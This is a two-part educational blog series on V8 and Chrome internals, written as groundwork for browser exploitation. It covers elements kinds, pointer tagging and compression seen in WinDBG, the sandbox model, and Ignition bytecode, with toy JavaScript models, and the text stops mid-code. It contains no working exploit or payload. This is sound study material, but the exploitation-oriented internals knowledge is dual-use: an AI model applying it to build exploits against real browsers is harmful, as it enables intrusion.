So let's take a closer look at this. For example, let's take the following two arrays:

const packed_array = [1,2,3,5.5,'x'];
// Elements Kind: PACKED_ELEMENTS
const holey_array = [1,2,,5,'x'];
// Elements Kind: HOLEY_ELEMENTS

As you can see, the holey_array has "holes" in it, since we forgot to add the 3 to the index and just left it blank or undefined. The reason that V8 makes this distinction is because operations on packed arrays can be optimized more aggressively than operations on holey arrays. If you want to learn more about that, then I suggest you watch Mathias Bynens's talk "V8 internals for JavaScript Developers" which details this very well.

V8 also implements the previously mentioned elements kind transitions on both PACKED and HOLEY arrays, which forms a "lattice". A simple visualization of those transitions from the V8 blog can be seen below.

Again, we must remember that elements kinds have one-way downward transitions through this lattice. For example, adding a floating-point number to an SMI array will mark it as double, and similarly, once a hole is created in an array, it's marked as holey forever, even if you fill it later.

V8 also has a second major distinction made on elements that we need to understand. In the element backing stores, just like in the properties store, elements can also be either fast or in dictionary-mode (slow). Fast elements are simply an array where the property index maps to the offset of the item in the elements store. As for slow arrays, these occur when there are large sparse arrays where only a few entries are occupied. In this case, the array backing store uses a dictionary representation, such as we've seen in the properties store, to save memory at the cost of performance. That dictionary will store the key, value, and element attributes as triplets.
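The one-way nature of the lattice can be imitated with a small tracker. This is a toy approximation and not V8's real logic: ToyElementsKind, categoryOf, and the rank table are hypothetical, and the sketch assumes Smis are 31-bit signed integers.

```javascript
// Toy model only: approximates the elements-kind lattice, not V8's real logic.
// Assumption: Smis are 31-bit signed integers.
const SMI_MIN = -(2 ** 30);
const SMI_MAX = 2 ** 30 - 1;

// Higher rank means a more general kind (further "down" the lattice).
const RANK = { SMI: 0, DOUBLE: 1, ELEMENTS: 2 };

function categoryOf(value) {
  if (typeof value !== 'number') return 'ELEMENTS';
  const isSmi = Number.isInteger(value) && !Object.is(value, -0) &&
    value >= SMI_MIN && value <= SMI_MAX;
  return isSmi ? 'SMI' : 'DOUBLE';
}

class ToyElementsKind {
  constructor() {
    this.category = 'SMI';
    this.holey = false;
  }
  // Record a stored value. The category can only become more general.
  observe(value) {
    const next = categoryOf(value);
    if (RANK[next] > RANK[this.category]) this.category = next;
    return this;
  }
  // Record a hole. Once holey, the kind never returns to packed.
  observeHole() {
    this.holey = true;
    return this;
  }
  toString() {
    const prefix = this.holey ? 'HOLEY' : 'PACKED';
    const suffix = this.category === 'ELEMENTS' ? 'ELEMENTS' : `${this.category}_ELEMENTS`;
    return `${prefix}_${suffix}`;
  }
}

const kind = new ToyElementsKind();
[1, 2, 3].forEach((v) => kind.observe(v));
console.log(String(kind)); // PACKED_SMI_ELEMENTS
kind.observe(3.337);
console.log(String(kind)); // PACKED_DOUBLE_ELEMENTS
kind.observe(7);           // storing an integer again does not move back up
kind.observeHole();
console.log(String(kind)); // HOLEY_DOUBLE_ELEMENTS
kind.observe('x');
console.log(String(kind)); // HOLEY_ELEMENTS
```

The tracker has no method that lowers the rank or clears the holey flag, which is the property of the lattice this section describes.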

Viewing Chrome Objects In-Memory

At this point we have covered a lot of complex topics on both JavaScript and V8 internals. Hopefully you now have a somewhat decent understanding of some of the concepts that make V8 work under the hood. Now that we have that knowledge, it's time we jump into observing what V8 and its objects look like in memory when observed via WinDBG and what types of optimizations are in use.

The reason we are using WinDBG is that when we are writing exploits, debugging our POC, etc., we will mostly be using WinDBG in combination with d8. In that case, it's good for us to be able to grasp and understand the nuances of V8's memory structure. In case you're not familiar with WinDBG, then I suggest you read and get familiar with the "Getting Started with WinDbg (User-Mode)" blog post from Microsoft and read "GDB commands for WinDbg Users" if you have used GDB before.

I know that we already looked into memory structures of objects and maps, and have messed around with d8 - so we should have a general idea of what points to what and where things are in memory. But don't be fooled into thinking it will be so easy. As with everything in V8, optimizations play a big part in allowing it to be fast and efficient, and this is also true of how it handles and stores values in memory.

What do I mean by that? Well, let's take a quick look into a simple V8 object structure using d8 and WinDBG. To start, let's initiate d8 again with the --allow-natives-syntax option, and create a simple object, such as:

d8> var obj = {x:1, y:2}

Once done, let's go ahead and use the %DebugPrint() function to print out the object's information.

d8> var obj = {x:1, y:2};
d8> %DebugPrint(obj)
DebugPrint: 000002530010A509: [JS_OBJECT_TYPE]
 - map: 0x025300259735 <Map[20](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x025300244669 <Object map = 0000025300243D25>
 - elements: 0x025300002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x025300002259 <FixedArray[0]>
 - All own properties (excluding elements): {
    00000253000041ED: [String] in ReadOnlySpace: #x: 1 (const data field 0), location: in-object
    00000253000041FD: [String] in ReadOnlySpace: #y: 2 (const data field 1), location: in-object
 }
0000025300259735: [Map] in OldSpace
 - type: JS_OBJECT_TYPE
 - instance size: 20
 - inobject properties: 2
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x0253002596ed <Map[20](HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x0253002043cd <Cell value= 1>
 - instance descriptors (own) #2: 0x02530010a539 <DescriptorArray[2]>
 - prototype: 0x025300244669 <Object map = 0000025300243D25>
 - constructor: 0x02530024422d <JSFunction Object (sfi = 000002530021BA25)>
 - dependent code: 0x0253000021e1 <Other heap object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

Afterwards, launch WinDBG and attach it to the d8 process. Once the debugger is hooked in, we'll execute the dq command followed by our object's memory address (0x0000020C0010A509) to display its memory contents. Your output should be pretty similar to mine.

Looking into the WinDBG output, we can see that we are using the correct memory address for the object. But, when we look into the memory contents, the first address (which should be a pointer to the map - if you recall our JSObject structure) seems to be corrupted. Well, one would think it's corrupted. The more experienced reverse engineers or exploit devs might even think that there is an offset/alignment issue, and you would technically be close, but not correct.

This, my friends, is again V8's optimizations at work. You can see why we need to discuss these optimizations, because to the untrained eye it is easy to get seriously lost and confused as to what is going on in memory. What we're actually seeing here are two things - Pointer Compression and Pointer Tagging.

We'll start by first understanding Pointer or Value tagging in V8.

Pointer Tagging

So, what is pointer tagging and why do we use it? Well, as we know, in V8 values are represented as objects and allocated on the heap - no matter if they are an object, array, number, or string. Now, many JavaScript programs perform calculations on integer values, so if we constantly had to create a new Number() object each time we incremented or modified a value, we would pay the overhead of creating the object and tracking it on the heap, and we would increase the memory used, making this very inefficient.

In that case, what V8 will do is that instead of creating a new object each time, it will actually store some of the values inline. While this works, it creates a second problem for us. And that problem is, how do we differentiate an object pointer from an inline value? Well, this is where pointer tagging comes into play.

The pointer tagging technique is based on the observation that on 32-bit and 64-bit systems, allocated data is word-aligned (at 4-byte boundaries). Because data is aligned this way, the two least significant bits (LSBs) of an address will always be zero. Tagging then uses these two bottom bits to differentiate between a heap object pointer and an integer or SMI.

On an x64 architecture, the following tagging scheme is used:

            |----- 32 bits -----|----- 32 bits -------|
Pointer:    |________________address______________(w1)|
Smi:        |____int32_value____|000000000000000000(0)|

As you can see from the example, a 0 in the least significant bit is used to represent a SMI, and a 1 is used to represent a pointer. One thing to note: if you are looking at SMIs in memory, while they are stored inline, they are actually doubled to avoid a pointer tag (the value is shifted left by one bit so that the tag bit stays 0). So, if your original value is 1, it will be 2 in memory.

Within the pointer we also have a w in the second LSB, which denotes a bit that is used to distinguish between a strong and a weak pointer reference. If you're not familiar with what a strong vs weak pointer is, I'll explain. Simply put, a strong pointer indicates that the object pointed to must remain in memory, while a weak pointer does not keep its target alive, so it may point to data that has already been deleted. The GC, or garbage collector, can only delete an object once no strong pointers to it remain.

With this pointer tagging scheme, arithmetic or binary operations on integers can ignore the tag, as the lower 32 bits will be all zeroes. However, when it comes to dereferencing a HeapObject, V8 needs to mask off the least significant bit first, so a special accessor is used that takes care of clearing the LSB.

Knowing that now, let's go back to our example in WinDBG and clear that LSB by subtracting 1 from the address. That should then provide us with valid memory addresses. Once done, your output should look like so.

As you can see, once we clear the LSB, we now have valid pointer addresses in memory! In particular we have the map, properties, elements, and then our in-object properties. Again, note that SMIs are doubled, so x which holds 1 is actually 2 in memory, and the same holds true for 2, as it is now 4.

To those with a keen eye, you might have noticed that only half of the pointer actually points to the object in memory. Why is that? If your answer was "another optimization" then you would be right. This is something called Pointer Compression, which we will now talk about.
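The tagging rules can be sketched with a few bitwise helpers. This is a minimal sketch that assumes a 32-bit tagged word, where a SMI is stored shifted left by one bit. The function names are hypothetical and are not V8's accessors.

```javascript
// Sketch of the tagging rules, assuming a 32-bit tagged word.
// All function names here are hypothetical.
const TAG_MASK = 0b11;  // the two least significant bits
const WEAK_TAG = 0b11;  // low bits 11 -> weak heap object pointer
                        // low bits 01 -> strong heap object pointer
                        // lowest bit 0 -> Smi

const tagSmi = (value) => value << 1;  // 1 -> 2, 2 -> 4
const untagSmi = (word) => word >> 1;  // arithmetic shift keeps the sign
const isSmi = (word) => (word & 1) === 0;
const isWeak = (word) => (word & TAG_MASK) === WEAK_TAG;
const untagPointer = (word) => word & ~TAG_MASK; // clear both tag bits

console.log(tagSmi(1), tagSmi(2)); // 2 4

// The low half of the object address printed by %DebugPrint() earlier.
const tagged = 0x0010a509;
console.log(isSmi(tagged), isWeak(tagged));    // false false
console.log(untagPointer(tagged).toString(16)); // 10a508
```

For a strong pointer, clearing the tag bits gives the same result as subtracting 1 from the address.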
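To tie this back to the object layout, the sketch below decodes a handful of 32-bit words the way we just did by hand. The sample words are not copied from the debugger. They are what the %DebugPrint() output above implies if each field is a 32-bit word in the order map, properties, elements, in-object properties. The helper names are hypothetical.

```javascript
// Assumed field order of the JSObject: map, properties, elements, then the
// in-object properties. Each field is assumed to be a 32-bit word.
const FIELD_NAMES = ['map', 'properties', 'elements', 'in-object x', 'in-object y'];

// Hypothetical sample words, derived from the %DebugPrint() output rather
// than taken from a real memory dump.
const words = [0x00259735, 0x00002259, 0x00002259, 0x00000002, 0x00000004];

function describeWord(word) {
  if ((word & 1) === 0) {
    // Tag bit 0: an inline Smi, stored doubled.
    return { kind: 'smi', value: word >> 1 };
  }
  // Tag bit 1: a heap pointer. Subtract the tag to get the real offset.
  return { kind: 'pointer', offset: '0x' + (word - 1).toString(16).padStart(8, '0') };
}

const decoded = words.map((word, i) => ({ field: FIELD_NAMES[i], ...describeWord(word) }));
for (const entry of decoded) {
  console.log(entry);
}
```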

Pointer Compression

Pointer Compression in Chrome and V8 makes use of an interesting property of objects on the heap, namely that heap objects are usually close to one another, so the most significant bits of the pointer will probably be the same. In that case, V8 only saves half of the pointer (the least significant bits) to memory and puts the most significant bits (upper 32 bits) of V8's heap (known as the isolate root) into a root register (R13). Whenever we need to access a pointer, the register and the value in memory are just added together and we get our full address. The compression scheme is implemented within the /src/common/ptr-compr-inl.h source file in V8.
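The decompression step is simple enough to sketch with BigInt arithmetic. The base value below is taken from the upper 32 bits of the addresses in the %DebugPrint() output shown earlier. The decompress and toHex helpers are hypothetical names for this sketch and are not V8 functions.

```javascript
// Upper 32 bits of the heap addresses seen in the %DebugPrint() output above.
// In a running process this base would be held in the root register.
const isolateRoot = 0x0000025300000000n;

// Decompress: add the 32-bit value stored in memory to the base.
function decompress(base, compressed) {
  return base + BigInt(compressed);
}

const toHex = (address) => '0x' + address.toString(16).padStart(16, '0');

const objectAddress = toHex(decompress(isolateRoot, 0x0010a509));
const mapAddress = toHex(decompress(isolateRoot, 0x00259735));

console.log(objectAddress); // 0x000002530010a509
console.log(mapAddress);    // 0x0000025300259735
```

Both results still carry the pointer tag in the lowest bit, so they match the tagged addresses that %DebugPrint() prints.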

Basically, the goal that the V8 team was trying to accomplish was to somehow fit both kinds of tagged values into 32 bits on 64-bit architectures, specifically to reduce overhead in V8 to try and get back as many wasted 4 bytes as possible within the x64 architecture.

Closing

And that about does it for our deep dive into JavaScript and V8 internals! I hope you enjoyed this post and I sincerely hope it helped some of you learn the complexities of V8.

I know this was a lot to cover, and honestly, it's very complex at first - so take your time to read through this and make sure you understand the basic concepts, because you'll need to understand how all of this works under the hood before we can exploit it. Remember, to know how to break something, we first need to know how it works.

In part two of this blog post series, we'll go back into further understanding the compiler pipeline, and explain what happens under the hood in Ignition, Sparkplug, and TurboFan. We'll also be focusing more on the JIT compiler, speculative guards, optimizations, assumptions and more, which will then allow us to better understand common JavaScript engine vulnerabilities such as type confusions.

Kudos

I would like to sincerely thank maxpl0it and Fletcher for proofreading this blog post, providing critical feedback and adding in a few important details before its release. You guys are awesome for taking the time to review this post for accuracy and readability. Thank you!

Chrome Browser Exploitation, Part 2: Introduction to Ignition, Sparkplug and JIT Compilation via TurboFan

16 November 2022 at 00:00

In my previous post “Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals”, we took our first deep dive into the world of browser exploitation by covering a few complex topics that are necessary as foundational knowledge. We mainly covered how JavaScript and V8 work under the hood by exploring what objects, maps and shapes are, how these objects are structured in memory, and some basic memory optimizations such as pointer tagging and pointer compression. We also touched on the compiler pipeline, bytecode interpreter, and code optimizations.

Now, if you haven’t read my previous post yet - then I highly recommend that you do so. Otherwise, you might be lost and totally unfamiliar with some of the topics presented within this post, since we are pretty much building off of the knowledge presented in Part 1 and further expanding on it.

In today’s blog post, we’ll go back to the compiler pipeline and further expand on some of the concepts that we talked about, such as V8’s bytecode, code compilation, and code optimization. Overall, in this post we will be taking a deep dive into what happens under the hood in Ignition, Sparkplug, and TurboFan, as they are critical to our understanding of how certain “features” can lead to exploitable bugs.

The following topics will be discussed:

  • Chrome Security Model
    • Multi-Process Sandbox Architecture
    • V8’s Isolate and Context
  • Ignition Interpreter
    • Understanding V8’s Bytecode
    • Understanding the Register-Based Machine
  • Sparkplug
    • 1:1 Mapping
  • TurboFan
    • Just-In-Time Compilation (JIT)
    • Speculative Optimization and Type Guards
    • Feedback Lattice
    • “Sea of Nodes” Intermediate Representation (IR)
  • Common Optimizations
    • Typer
    • Range Analysis
    • Bounds Checking Elimination (BCE)
    • Redundancy Elimination
    • Other Optimizations
      • Control Optimization
      • Alias Analysis & Global Value Numbering
      • Dead Code Elimination (DCE)
  • Common JIT Compiler Vulnerabilities

Alright, with that long and scary list of complex topics out of the way, let’s take a deep breath and dive right in!

Note: Most, if not all of the highlighted code paths are clickable links. Use these links to be taken to the relevant part of the Chromium source code so that you can examine the code more closely and follow along with the post.

Also, take the time to read through the code comments. The Chromium source code, while complex, has some pretty good comments that can help you understand what a given part of the code is and what it does.

Chrome Security Model

Before we dive into understanding the complexities of the compiler pipeline, how it does optimizations, and where bugs can appear, we first need to take a step back and look at the bigger picture. While the compiler pipeline plays a big role in JavaScript execution, it’s only one piece of the puzzle within the whole architecture of browsers.

As we’ve seen, V8 can run as a standalone application, but when it comes to the browser as a whole, V8 is actually embedded into Chrome and then utilized via bindings by another engine. Because of this, there are nuances and certain implications that we need to be aware of on how JavaScript code within an application is processed because that information is critical to our understanding of security issues within a browser.

For us to see this “bigger picture”, and to put together all the pieces of the puzzle, we need to start off by understanding the Chrome Security Model. This blog post series is a journey through browser internals and exploitation after all. So, to better understand why certain bugs are more trivial than others, and why exploitation of just one bug might not lead to direct remote code execution, we need to understand the architecture of Chromium.

As we know, JavaScript engines are an integral part of the execution of JavaScript code on systems. While they play a big role in making browsers fast and efficient, they can also open up a browser to crashes, application hang-ups, and even security risks. But JavaScript engines aren’t the only part of a browser that can have issues or vulnerabilities. Many other components, such as the APIs or the HTML and CSS rendering engines being used, can also have stability issues and vulnerabilities that could potentially be exploited - whether intentionally or not.

Now, it’s nearly impossible to build a JavaScript or rendering engine that will never crash. And it’s also nearly impossible to build these types of engines to be safe and secure from bugs and vulnerabilities - especially because most of these components are written in C++, a statically typed language that has to handle the dynamic nature of web applications.

So how does Chrome handle such an “impossible” task of trying to keep the browser running efficiently while also trying to keep the browser, system, and its users secure? In two ways: by using a multi-process architecture and by sandboxing.

Multi-Process Sandbox Architecture

Chromium’s multi-process architecture is just that, an architecture that uses multiple processes to protect the browser from instability issues and bugs that can stem from the JavaScript engine, render engine, or other components. Chromium also restricts access between each of these processes by only allowing certain processes to talk to one another. This type of architecture can be viewed as the incorporation of memory protection and access controls within an application.

In general, browsers have one main process that runs the UI and manages all the other processes - this is known as the “browser process” or “browser” for short. Very unique, I know. The processes that handle the web content are known as the “renderer processes” or “renderers”. These renderer processes utilize something called Blink, which is the open-source rendering engine used by Chrome. Blink relies on many other libraries that help it run, such as Skia, which is an open-source 2D graphics library, and of course V8 for JavaScript.

Now, here is where things get a little bit complicated. In Chrome, each new window or tab opens up in a new process - which usually will be a new renderer process. This new renderer process has a global RenderProcess object that manages communication with the parent browser process and maintains the global state of the web page or application within that window or tab. In turn, the main browser process maintains a corresponding RenderProcessHost object for each renderer, which manages browser state and communication for that renderer.

To communicate between each of these processes, Chromium uses either a legacy IPC system or Mojo. I’m not going to go into too much detail on how these work, because honestly the architecture and communication scheme of Chrome could be a separate blog post in and of itself. I will leave it up to the reader to follow the links and do their own research.

Overall, talk is cheap, and computational power is expensive. To help with better visualizing what we just explained, the image below from the Chromium development team will provide us with a high-level overview of what that multi-process architecture looks like.

In addition to each of these renderers being in its own process, Chrome also takes the opportunity to restrict each process’s access to system resources via sandboxing. By sandboxing each process, Chrome can ensure that a renderer’s only access to network resources is via the network service dispatcher running within the main process. Additionally, it can restrict the process’s access to the filesystem, as well as to the user’s display, cookies, and input.

In general, this limits what an attacker can do if they obtain remote code execution within a renderer process. Essentially, they won’t be able to make persistent changes to the computer or access information such as user input and cookies in other windows and tabs without exploiting or chaining another bug to break out of that sandbox.

I won’t go into any more detail from here as this will take away from the current topic of the blog post. But I highly suggest that you read the “Chromium Windows Sandbox Architecture” documentation in depth to not only understand the design principles, but to better understand the broker and target process communication scheme.

So what does this look like in practice? Well, we can see a practical example of this by starting up Chrome, opening two tabs and launching Process Monitor. Initially we should see that Chrome has one parent or “browser” process and a few child processes, like so.

Now if we were to look into the main parent process, and compare it to a child process, we will notice that the other processes are running with different command line parameters. In the case of this example, we see that the child process (on the right) is that of the renderer type, and matches its parent browser process (on the left). Cool, right?

Alright, after covering all of this, I know that you might be asking: what does all of this have to do with V8 and JavaScript? Well, if you were paying attention, then you would have noticed a key point when I brought up Chrome’s rendering engine, Blink. And that’s the fact that it uses V8.

If you took the time to read up on some of the Blink documentation as a good student should, then you would have learned a little about Blink. The documentation states that Blink runs in each renderer process and has one main thread which handles JavaScript, DOM, CSS, style and layout calculations. Additionally, Blink can create multiple “worker” threads to run additional scripts, extensions, etc.

In general, each Blink thread runs its own instance of V8. Why? Well, as you know, within a separate browser window or tab there can be a lot of JavaScript code running, not just for the page, but in different iframes for stuff like ads, buttons, etc. At the end of the day, each of those scripts and iframes has a separate JavaScript context, and there has to be a way of preventing one script from manipulating objects in another.

To help “isolate” one script’s context from another, V8 implements two concepts known as the Isolate and the Context, which we will now talk about.

V8’s Isolate and Context

In V8, an Isolate is simply an instance or “virtual machine” which represents one JavaScript execution environment, including a heap manager, a garbage collector, etc. In Blink, isolates and threads have a 1:1 relationship, where one isolate is associated with the main thread and one isolate is associated with each worker thread.

Now, the Context corresponds to a global root object which holds the state of the VM and is used to compile and execute scripts in a single instance of V8. Roughly speaking, one window object corresponds to one context, and since each frame has a window object, there are potentially multiple contexts in a renderer process. In relation to the isolate, the isolate and contexts have a 1:N relationship over the lifetime of the isolate - where that specific isolate or instance will interpret and compile multiple contexts.

This means that each time JavaScript needs to be executed, we need to validate that we are in the correct context via GetCurrentContext(), or we’ll end up either leaking JavaScript objects or overwriting them, which can potentially cause a security issue.
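We can get a feel for this separation outside of Chrome with Node.js, which embeds V8 and exposes contexts through its built-in vm module. The sketch below is only an analogy for what Blink does with frames: the names pageContext and iframeContext are made up, and both contexts live in the same Node.js process.

```javascript
const vm = require('vm');

// Each createContext() call produces a separate global object (a separate V8 Context)
// inside the same Node.js process.
const pageContext = vm.createContext({});
const iframeContext = vm.createContext({});

// A global defined in one context is invisible in the other.
vm.runInContext('var secret = 42;', pageContext);
const seenFromIframe = vm.runInContext('typeof secret', iframeContext);
console.log(seenFromIframe);             // prints "undefined"

// Each context also gets its own copies of the built-ins.
const pageArray = vm.runInContext('Array', pageContext);
const iframeArray = vm.runInContext('Array', iframeContext);
console.log(pageArray === iframeArray);  // prints "false"
```

Because each context has its own globals and its own built-ins, running a script in the wrong context means it sees (and can modify) objects it was never meant to reach, which is exactly the class of mistake described above.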

In Chrome, the runtime object v8::Isolate is implemented in v8/include/v8-isolate.h and the v8::Context object is implemented in v8/include/v8-context.h. Using what we know, from a high level, we can visualize the runtime and context inheritance in Chrome to look like so:

If you would like to learn more about how Isolates and Contexts work in depth, then I suggest reading “Design of V8 Bindings” and “Getting Started with Embedding V8”.

Ignition Interpreter

Now that we have a general overview of Chromium’s architecture, and understand that all JavaScript code isn’t executed in the same V8 engine instance, we can finally go back into the compiler pipeline and continue our deep dive.

We’ll start off by understanding V8’s interpreter, Ignition, in more depth.

As a recap from Part 1, let’s take a look back at our high-level overview of the V8 compilation pipeline just so we know where we are within this pipeline.

We already covered Tokens and Abstract Syntax Trees (AST) in Part 1, and we briefly explained how an AST is parsed and then translated into bytecode within the Interpreter. What I want to do now is cover V8’s bytecode, since the bytecode produced by the interpreter is a critical building block that makes up any JavaScript functionality. Additionally, when Ignition executes bytecode, it also collects profiling and feedback data each time a JavaScript function is run. This feedback data is then used by TurboFan to generate JIT optimized machine code.

But before we can begin to understand how the bytecode is structured, we first need to understand how Ignition implements its “register machine”. The reason is that each bytecode specifies its inputs and outputs as register operands, so we need to know where these inputs and outputs will go on the stack. This will also help us with further visualizing and understanding the stack frames that are produced in V8.

Understanding the Register-Based Machine

As we know, the Ignition interpreter is a register-based interpreter with an accumulator register. These “registers” aren’t actually traditional machine registers as one would think. Instead, they are specific slots in a register file which is allocated as part of a function’s stack frame - in essence they are “virtual” registers. As we’ll see later, bytecodes specify the input and output registers on which they operate.

Ignition consists of a set of bytecode handlers which are written in a high-level, machine-agnostic assembly code. These handlers are implemented by the CodeStubAssembler class and compiled by using TurboFan’s backend when the browser is compiled. Overall, each of these handlers “handles” a specific bytecode and then dispatches to the next bytecode’s respective handler.

An example of the LdaZero or “Load Zero to Accumulator” bytecode handler from v8/src/interpreter/interpreter-generator.cc can be seen below.

// LdaZero
// Load literal '0' into the accumulator.
IGNITION_HANDLER(LdaZero, InterpreterAssembler) 
{
  TNode<Number> zero_value = NumberConstant(0.0);
  SetAccumulator(zero_value);
  Dispatch();
}

When V8 creates a new isolate, it will load the handlers from a snapshot file that was created during build time. The isolate will also contain a global interpreter dispatch table which holds a code object pointer to each bytecode handler, as indexed by the bytecode value. Generally, this dispatch table is simply an array of handler addresses, with the bytecode’s enum value serving as the index.
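The handler-plus-dispatch-table pattern can be sketched in a few lines of JavaScript. This is a toy model, not V8’s code: the opcode numbers, the state object and the run helper are all invented for illustration, and only the idea (each handler does its work and then dispatches to the next bytecode’s handler through a table indexed by the bytecode value) comes from the description above.

```javascript
// Hypothetical opcode numbers; V8's real values come from its bytecode enum.
const Bytecode = { LdaZero: 0, LdaSmi: 1, Return: 2 };

// The dispatch table is an array indexed by the bytecode value; each entry is a handler.
const dispatchTable = [];

// Jump to the handler for the bytecode at the current offset.
function dispatch(state) {
  const opcode = state.bytecodes[state.offset];
  return dispatchTable[opcode](state);
}

dispatchTable[Bytecode.LdaZero] = (state) => {
  state.accumulator = 0;    // load literal 0 into the accumulator
  state.offset += 1;        // LdaZero has no operands
  return dispatch(state);   // hand over to the next bytecode's handler
};

dispatchTable[Bytecode.LdaSmi] = (state) => {
  state.accumulator = state.bytecodes[state.offset + 1];  // one immediate operand
  state.offset += 2;
  return dispatch(state);
};

// Return ends the chain of dispatches and yields the accumulator.
dispatchTable[Bytecode.Return] = (state) => state.accumulator;

function run(bytecodes) {
  return dispatch({ bytecodes, offset: 0, accumulator: undefined });
}

console.log(run([Bytecode.LdaSmi, 7, Bytecode.LdaZero, Bytecode.Return]));  // prints 0
```

Note that there is no central loop: every handler ends by looking up and calling the next handler, which mirrors the Dispatch() call at the end of the LdaZero handler shown earlier.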

In order for the bytecode to be run by Ignition, the JavaScript function is first translated to bytecode from its AST by a BytecodeGenerator. This generator walks the AST and emits the appropriate bytecode for each AST node by calling the GenerateBytecode function.

This bytecode is then associated with the function (which is a JSFunction object) in a field that points to its SharedFunctionInfo object. Afterwards, the JavaScript function’s code_entry_point is set to the InterpreterEntryTrampoline built-in stub.

The InterpreterEntryTrampoline stub is entered when a JavaScript function is called, and is responsible for setting up the appropriate interpreter stack frame while also dispatching to the interpreter’s bytecode handler for the first bytecode of the function. This then starts the execution or “interpretation” of the function by Ignition, which is handled within the v8/src/builtins/x64/builtins-x64.cc source file.

Specifically, on Lines 1255 - 1387 within builtins-x64.cc the Builtins::Generate_InterpreterPushArgsThenCallImpl and Builtins::Generate_InterpreterPushArgsThenConstructImpl functions are responsible for further building out the interpreter stack frame by pushing the arguments and function state to the stack.

I won’t get too much more into the bytecode generator, but if you want to expand your knowledge, then I suggest reading the “Ignition Design Documentation: Bytecode Generation” section to get a better understanding of how it works under the hood. What I want to focus on in this section is the register allocation and stack frame creation for a function.

So how does this stack frame get generated?

Well, during bytecode generation, the BytecodeGenerator will also allocate registers in a function’s register file for local variables, context object pointers, and temporary values that are required for expression evaluation.

The InterpreterEntryTrampoline stub handles the initial building of the stack frame, and then allocates space in the stack frame for the register file. This stub will also write undefined to all the registers in this register file so that the Garbage Collector (GC) doesn’t see any invalid (i.e., non-tagged) pointers when it walks the stack.

Bytecode will operate on these registers by specifying them in its operands, and Ignition will then load or store data from the specific stack slot that is associated with the register. Since register indexes map directly to the function stack frame slots, Ignition can directly access other slots on the stack, such as the context and the arguments that were passed in with the function.
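Here is a rough sketch of those two ideas: a register file that is pre-filled with undefined, and register operands that are really just signed offsets into the frame. The operand-to-name mapping below is not taken from V8’s source. It is inferred purely from the bytecode listings later in this post (where fa shows up as r0, f9 as r1, f8 as r2, fe as the closure and 03 as a0), so treat it as specific to that build and as an assumption everywhere else. The 8 bytes per slot matches those listings too (3 registers give a frame size of 24).

```javascript
const kSystemPointerSize = 8;  // bytes per stack slot on x64

// Allocate a register file and fill it with undefined, as the trampoline does,
// so a stack walk never sees uninitialized slots.
function createRegisterFile(registerCount) {
  return new Array(registerCount).fill(undefined);
}

function frameSize(registerCount) {
  return registerCount * kSystemPointerSize;
}

// Decode a one-byte register operand into a readable name.
// Mapping inferred only from this post's listings:
//   fa -> r0, f9 -> r1, f8 -> r2, fe -> <closure>, 03 -> a0
function decodeRegisterOperand(byte) {
  const signed = byte > 0x7f ? byte - 0x100 : byte;  // reinterpret as a signed 8-bit value
  if (signed <= -6) return 'r' + (-6 - signed);      // local registers
  if (signed === -2) return '<closure>';
  if (signed >= 3) return 'a' + (signed - 3);        // arguments
  return '<unknown ' + signed + '>';                 // slots not seen in the listings
}

console.log(frameSize(3));                 // prints 24
console.log(decodeRegisterOperand(0xfa));  // prints "r0"
console.log(decodeRegisterOperand(0x03));  // prints "a0"
```

The takeaway is that locals, the closure and the arguments all share one signed index space, which is why a single operand byte can reach any of them.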

An example of what a stack frame for a function looks like (as provided by the Chromium team) can be seen below. Take note of the “Interpreter Stack Frame”. This is the stack frame that is built by the InterpreterEntryTrampoline.

As you can see, we have the function’s arguments in red, and its local variables and temporary variables for expression evaluation in green.

The light green portion contains the Isolate’s current context object, the caller pointer counter, and a pointer to the JSFunction object. This pointer to JSFunction is also known as the closure, which links to the function’s context, SharedFunctionInfo object, as well as to other accessors like the FeedbackVector. An example of what this JSFunction looks like in memory can be seen below.

You might also notice that there is no accumulator register in the stack frame. The reason is that the accumulator changes constantly during function calls, so it’s kept within the interpreter as a state register. This state register is pointed to by the Frame Pointer (FP), which also holds the stack pointer and frame counter.

Going back to the first stack frame example, you will also notice that there is a Bytecode Array pointer. This BytecodeArray represents a sequence of interpreter bytecodes for that specific function within the stack frame. Each bytecode is an enum value that serves as the index of its corresponding handler in the dispatch table - as explained previously.

An example of this BytecodeArray can be seen in v8/src/objects/code.h and a snippet of that code is provided below.

// BytecodeArray represents a sequence of interpreter bytecodes.
class BytecodeArray
    : public TorqueGeneratedBytecodeArray<BytecodeArray, FixedArrayBase> {
 public:
  static constexpr int SizeFor(int length) {
    return OBJECT_POINTER_ALIGN(kHeaderSize + length);
  }

  inline byte get(int index) const;
  inline void set(int index, byte value);

  inline Address GetFirstBytecodeAddress();

  inline int32_t frame_size() const;
  inline void set_frame_size(int32_t frame_size);

As you can see, the GetFirstBytecodeAddress() function is responsible for getting the first bytecode address in the array. So how does it find that address?

Well let’s take a quick look at the bytecode generated for var num = 42.

d8> var num = 42;
[generated bytecode for function:  (0x03650025a599 <SharedFunctionInfo>)]
Bytecode length: 18
Parameter count 1
Register count 3
Frame size 24
Bytecode age: 0
         000003650025A61E @    0 : 13 00             LdaConstant [0]
         000003650025A620 @    2 : c4                Star1
         000003650025A621 @    3 : 19 fe f8          Mov <closure>, r2
         000003650025A624 @    6 : 66 5f 01 f9 02    CallRuntime [DeclareGlobals], r1-r2
         000003650025A629 @   11 : 0d 2a             LdaSmi [42]
         000003650025A62B @   13 : 23 01 00          StaGlobal [1], [0]
         000003650025A62E @   16 : 0e                LdaUndefined
         000003650025A62F @   17 : aa                Return

Don’t worry about what each of these bytecodes means; we’ll explain that in a little bit. Take a look at the first line in the bytecode array, which stores LdaConstant. To the left of it we see 13 00. The hex number 0x13 is the bytecode’s enum value, which determines where the handler for that bytecode is found in the dispatch table.
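To see how the raw bytes in that listing break down into instructions, here is a small decoding sketch. The opcode values and instruction lengths in the table are simply read off the listing above, so they are specific to the V8 build that produced it; the decode helper itself is made up for this example.

```javascript
// Raw bytes of the 18-byte bytecode array shown above.
const bytes = [
  0x13, 0x00,
  0xc4,
  0x19, 0xfe, 0xf8,
  0x66, 0x5f, 0x01, 0xf9, 0x02,
  0x0d, 0x2a,
  0x23, 0x01, 0x00,
  0x0e,
  0xaa,
];

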